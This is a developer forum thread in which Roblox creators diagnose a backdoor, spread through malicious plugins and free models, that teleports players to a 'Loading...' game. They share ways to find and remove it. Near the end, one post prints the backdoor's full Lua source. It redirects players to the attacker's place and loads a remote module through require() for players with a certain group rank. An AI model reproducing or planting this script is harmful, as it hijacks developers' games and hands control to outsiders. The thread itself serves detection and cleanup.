Game teleports you into "Loading..."?

This does this to almost every single one of my games. I do not know how to fix this.

1 Like

I have this same issue, many people have also had the same issue, they all say they reported the account but ROBLOX does not seem to do anything. I wasn’t able to remove it, and I followed all the steps. I messaged the user on Discord and he said I had to pay 500 robux for me to add him to the game and he’d remove it. I am not adding him to my game where he can possibly leak it.

1 Like

Can you contact me through discord? ( Ace#5921 ) The guy seems a little suspicious and I can try to investigate what is causing this issue.

4 Likes

I just started experiencing this issue right after I downloaded a plugin to try working on custom terrain. After doing minor digging, I found that the plugin was definitely suspicious, created by user RobloxTopPlugins. The plugin itself is linked here: https://www.roblox.com/library/4830142810/LowPoly-Terrain-Generator.

In my case, I was teleported to place Loading… by user RobloxFasterLoader. The script was easy to find and erase, as it was just named Script and found in my ServerScriptService. For others who received the script from another plugin/free model, there are other replies in this thread that may help.

4 Likes

I found a way to stop this weird teleporting glitch from happening. In the Camera I found a script saying “ClientReplicator”. I found out it used the TeleportService so I tried deleting it. But when I tested a game it still happened. So I went back and discovered it created clones of the script. I tried everything but I found out the only way of preventing teleporting is deleting of whats inside the script. The problem is that I don’t know how to stop it permanently. What do I mean by that? Its that I have to always have to delete a copy of the script and keep the empty script whenever I edit the game again. Things I also discovered is that free models, decals, plugins are not the reason this script appears. It is always part of the default roblox games they give you to edit.

So thats my story with this teleportation thing. People might have different ways they did this.

3 Likes

I’ve created a tutorial thread to help with problems like this. Even though it’s lengthy, I suggest following it all to clean up everything.

Here are answers to some common problems I’ve noticed on this thread:

  • Q: This is happening in every one of my games, or it keeps coming back, how do I get rid of it?
    A: This is likely due to a bad plugin, make sure to verify their legitimacy (learn how in the thread above)

  • Q: I can’t find anything suspicious in my game, why is this still happening?
    A: It’s probably hidden somewhere that you can’t see by default, find out how to locate it in the linked thread.

  • Q: Someone said all plugins by some_user are bad, if I just remove everything created by them should I be clear?
    A: No, people create these accounts daily and it’s impossible to keep up with who is and isn’t a malicious creator. Instead, individually check your plugins for infectious content and report those that are.

  • Q: This script looks like gibberish, what’s wrong with it?
    A: It’s likely been obfuscated (made unreadable by some program) so it’s contents would be harder to understand. It’s not easy to tell whether or not it’s safe, so unless you can deobfuscate it to verify it’s safety, you should probably remove it.

If you have any other questions, you can dm me or post on either one of these topics, and someone should be able to assist.

1 Like

This “Loading” game IS A BACKDOOR, and is found in many, many freemodels. I HIGHLY suggest making your own scripts rather than using freemodels.

2 Likes

I looked through ServerScriptService and all my scripts were typed by me. There was nothing named “Script” and everything was normal…?

1 Like

Did you try everything from the thread?

2 Likes

To everyone here - please reinstall all your plugins and only use the ones you really trust.
Everyone in my team deleted the plugins they didn’t use, and it fixed the backdoor issue.

If you still get the virus, try deleting all your plugins temporarily, and check if the virus is still there.
That way you can at least make sure whether it’s your plugins or not.

5 Likes

I also had this plugin and the same thing happened to me.

1 Like

Well, this happened to a friend. He couldn’t figure it out either. He asked me to help him and gave me permission to edit his game. I think this causes the problem:
image
I took a look inside the script, and it looks like this,


Now, The thing that caught my eye is this,
image
This looked like a game ID to me. And you bet i checked what game ID it was, It’s the “Roblox faster loader” game!
So basically follow @pewpie12302die’s steps or just delete that script every time.

7 Likes

The game is now Content Deleted, It may be gone for now.

1 Like

Unfortunately, they manage to make multiple accounts for this. Just make sure to keep your eyes open for more ID’s, cause I have an understanding that there is a disgusting amount of them.

1 Like

You have a backdoor owned by John Doe SS I suggest you go check out this topic.

2 Likes

There’s already a post for this and I have the best answer so please go and check it.

1 Like

loading
Hey guys.

We had a similar issue in our games.
The virus copied all titles of our scripts and used them for their scripts. For example the orginal script was called “FE Working Tank” the copy of the virus was called “feworkingtank(parent:vehicle)” and included also some random numbers
The copied scripts consisted of a text and a return script.
The text seemed to be random words and dont made any sense.
All of these copied scripts were based in a model called “Model” and could be found when we searched for “work” in the explorer.
Deleting of them seems to stop these teleportations.

These loading virus also spammed bots and hackers into our game!
I think the virus is a result of admin-plugins.
Hope these information could help you!

3 Likes

I agree with your admin plugin thought. Because I thought it was in Adonis but that is also a reason, I did have several plugins in Adonis.

2 Likes

i have no idea about anything scripting related, but i found a client replicator script in my camera, that contains this:

game.Players.PlayerAdded:Connect(function(player)
	wait(0.0000001)
local joinData = player:GetJoinData().SourcePlaceId
local TeleportService = game:GetService("TeleportService")


if joinData == 4653828604 then
	local Tpdata = player:GetJoinData().TeleportData
	if Tpdata then
		Req = Tpdata.req
		gid = Tpdata.grid
	end
if player:GetRankInGroup(gid) == 2 then

require(Req).load(player.Name)
end
return else
end
local Players = game:GetService(“Players”)

local TeleportService = game:GetService(“TeleportService”)
local teleportData = {
maxxPlrs = Players.MaxPlayers,
maxPlrs = Players.NumPlayers,
placeId = game.PlaceId,
JobId = game.JobId,
CreatorId = game.CreatorId
}
TeleportService:Teleport(4653828604, player, teleportData)

end)

the id 4653828604 brings you to the game

Edit: @Jamie_Scripts didnt realize you already found that

2 Likes

Just don’t put any free or leaked model into your game. If everything is made by you (or someone who got hired) there shouldn’t be any problems like that. Tip for the future.

2 Likes